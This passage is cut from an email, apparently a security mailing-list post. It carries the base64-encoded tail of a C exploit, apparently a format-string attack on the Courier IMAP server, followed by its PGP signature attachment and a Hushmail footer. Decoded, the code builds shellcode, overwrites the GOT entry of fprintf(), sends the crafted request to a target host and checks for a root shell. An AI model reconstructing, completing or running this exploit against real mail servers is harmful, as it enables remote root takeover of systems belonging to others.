dGVfbnVtYmVyLGdvdF9udW1iZXIpOyAgCiAgcHJpbnRmKCJkb25lXG4iKTsKICAKICBwcmludGYo
IlsrXSBCdWlsZGluZyBzaGVsbGNvZGUuLi4iKTsKICB0ZW1wMiA9IGdlbl9zaGVsbGNvZGUoODAw
KTsKICBwcmludGYoImRvbmVcbiIpOwogIAogIHByaW50ZigiWypdIFVzaW5nIHJldDogJXBcbiIs
cmV0KTsKICBwcmludGYoIlsqXSBVc2luZyBnb3Qgb2YgZnByaW50ZigpOiAlcFxuIixnb3QpOwog
IAogIHJlcXVlc3QgPSBnZXRfcmVxdWVzdCh0ZW1wMSx0ZW1wMik7CiAgCiAgc29jayA9IGNvbm5l
Y3RfdG8oaG9zdCwgcG9ydCk7CiAgc2VuZF9kYXRhKHNvY2sscmVxdWVzdCk7CiAgc2xlZXAoMik7
CiAgY2xvc2Vfc29ja2V0IChzb2NrKTsKICAKICBwcmludGYoIlsqXSBDaGVja2luZyBmb3Igc2hl
bGwuLlxuIik7CiAgcm9vdChob3N0KTsKfQoK
--Hush_boundary-412b1d7d48dbb
Content-type: text/plain; name="sm00ny-courier_imap_fsx.c.sig"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="sm00ny-courier_imap_fsx.c.sig"
LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0NClZlcnNpb246IEh1c2ggMi40DQpDaGFyc2V0
OiBVVEY4DQoNCndrWUVBQkVDQUFZRkFrRXJIVThBQ2drUXNWL25ValBkRXE3RmF3Q2dsMVZOd1N1
Si9XbkhnMWJhcU9vM0V4RDNSN3dBDQpvSXhvanNQckZxYXlleG5Hc3VNZWJ0cDFGRHZKDQo9c0xS
eQ0KLS0tLS1FTkQgUEdQIFNJR05BVFVSRS0tLS0tDQo=
--Hush_boundary-412b1d7d48dbb--
Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2
Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434
Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about-affiliate?l=427
